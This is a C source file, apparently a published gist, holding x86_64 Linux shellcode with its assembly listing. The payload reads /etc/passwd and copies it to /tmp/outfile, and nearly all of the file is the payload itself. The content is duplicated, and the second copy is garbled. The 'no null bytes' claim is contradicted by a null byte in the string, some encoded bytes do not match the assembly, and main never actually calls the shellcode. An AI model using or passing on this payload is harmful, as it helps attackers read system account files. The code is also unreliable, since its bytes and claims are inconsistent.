Chiggins/passwdTotmpoutfile.c

## passwdTotmpoutfile.c
/*
Reads data from /etc/passwd to /tmp/outfile
No null bytes

Author: Chris Higgins <chris@chigs.me>
        @ch1gg1ns -- github.com/chiggins
        chigstuff.com
Date:   3-27-2014
Size:   118 bytes
Tested: ArchLinux x86_64 3.13.6-1
Assembly:
        xor rax, rax
        mov al, 2
        xor rdi, rdi
        mov rbx, 0x647773
        push rbx
        mov rbx, 0x7361702f6374652f
        push rbx
        lea rdi, [rsp]
        xor rsi, rsi
        syscall
        mov rbx, rax
        xor rax, rax
        mov rdi, rbx
        mov rsi, rsp
        mov dx, 0xFFFF
        syscall
        mov r8, rax
        mov rax, rsp
        xor rbx, rbx
        push rbx
        mov rbx, 0x656c6966
        push rbx
        mov rbx, 0x74756f2f706d742f
        push rbx
        mov rbx, rax
        xor rax, rax
        mov al, 2
        lea rdi, [rsp]
        xor rsi, rsi
        push 0x66
        pop si
        syscall
        mov rdi, rax
        xor rax, rax
        mov al, 1
        lea rsi, [rbx]
        xor rdx, rdx
        mov rdx, r8
        syscall
*/

#include <stdio.h>
#include <string.h>

char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";

int main() {
    printf("len: %d bytes", sizeof shellcode);
    (*(void (*)()) shellcode);
    return 0;
}
	/*
	Reads data from /etc/passwd to /tmp/outfile
	No null bytes

	Author: Chris Higgins <chris@chigs.me>
	@ch1gg1ns -- github.com/chiggins
	chigstuff.com
	Date: 3-27-2014
	Size: 118 bytes
	Tested: ArchLinux x86_64 3.13.6-1
	Assembly:
	xor rax, rax
	mov al, 2
	xor rdi, rdi
	mov rbx, 0x647773
	push rbx
	mov rbx, 0x7361702f6374652f
	push rbx
	lea rdi, [rsp]
	xor rsi, rsi
	syscall
	mov rbx, rax
	xor rax, rax
	mov rdi, rbx
	mov rsi, rsp
	mov dx, 0xFFFF
	syscall
	mov r8, rax
	mov rax, rsp
	xor rbx, rbx
	push rbx
	mov rbx, 0x656c6966
	push rbx
	mov rbx, 0x74756f2f706d742f
	push rbx
	mov rbx, rax
	xor rax, rax
	mov al, 2
	lea rdi, [rsp]
	xor rsi, rsi
	push 0x66
	pop si
	syscall
	mov rdi, rax
	xor rax, rax
	mov al, 1
	lea rsi, [rbx]
	xor rdx, rdx
	mov rdx, r8
	syscall
	*/

	#include <stdio.h>
	#include <string.h>

	char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";

	int main() {
	printf("len: %d bytes", sizeof shellcode);
	((void ()()) shellcode);
	return 0;
	}